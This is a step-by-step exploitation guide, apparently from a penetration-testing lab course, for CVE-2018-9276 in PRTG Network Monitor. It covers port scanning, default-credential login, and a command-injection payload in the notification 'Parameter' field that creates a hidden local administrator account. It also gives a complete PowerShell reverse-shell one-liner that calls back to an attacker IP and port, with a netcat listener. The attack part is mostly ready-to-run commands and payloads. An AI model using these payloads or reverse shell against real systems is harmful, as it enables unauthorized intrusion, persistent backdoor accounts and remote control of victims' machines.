13. PRTG Network Monitor

Introduction

This section details how to exploit PRTG Network Monitor, specifically focusing on CVE-2018-9276, an authenticated command injection vulnerability. The following steps guide the exploitation process:


1. Discovery and Enumeration

Nmap Scan

Use Nmap to scan all TCP ports and identify service versions:

sudo nmap -sV -p- --open -T4 10.129.201.50

Look for port 8080 reporting the service banner "Indy httpd 17.3.33.2830 (Paessler PRTG bandwidth monitor)".

EyeWitness Scan

EyeWitness may reveal default credentials (prtgadmin:prtgadmin).

cURL Version Check

Retrieve the PRTG version from the web page's source code:

curl -s http://10.129.201.50:8080/index.htm -A "Mozilla/5.0 (compatible; MSIE 7.01; Windows NT 5.0)" | grep version

2. Exploiting CVE-2018-9276 (Authenticated Command Injection)

Login

Attempt to log in with default or discovered credentials (prtgadmin:Password123).

  • Go to Setup -> Account Settings -> Notifications in the PRTG web interface.

Add a New Notification

  1. Click Add new notification.

  2. Name the notification (e.g., pwn).

  3. Scroll down and check EXECUTE PROGRAM.

  4. In Program File, select Demo exe notification - outfile.ps1.

  5. In the Parameter field, enter the command injection payload:

test.txt;net user prtgadm1 Pwn3d_by_PRTG! /add;net localgroup administrators prtgadm1 /add

  6. Click Save.

Test Notification

  • On the Notifications page, click the Test button for the newly created notification.

  • A popup will say EXE notification is queued up.


3. Verification

Using CrackMapExec (SMB)

Check if the new user has local admin access:

sudo crackmapexec smb 10.129.201.50 -u prtgadm1 -p Pwn3d_by_PRTG!

Alternative Verification Methods

  • Try logging in via RDP, WinRM, or using:

    • evil-winrm

    • wmiexec.py

    • psexec.py (from the Impacket toolkit)


4. Reverse Shell (Alternative Payload)

Instead of adding a user, execute a PowerShell reverse shell:

test.txt;powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.15',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Start Netcat Listener

On your attack machine:

nc -lvp 4444

Key Points

  • Replace 10.129.201.50 with the target IP address.

  • Modify 10.10.14.15:4444 to match your attack machine's IP address and port.

  • Use semicolons (;) to separate commands in the payload.

  • Ensure the target PRTG version is vulnerable (before 18.2.39).

  • PowerShell execution policies may block scripts—consider bypass techniques.

  • Always test on systems where you have explicit permission.
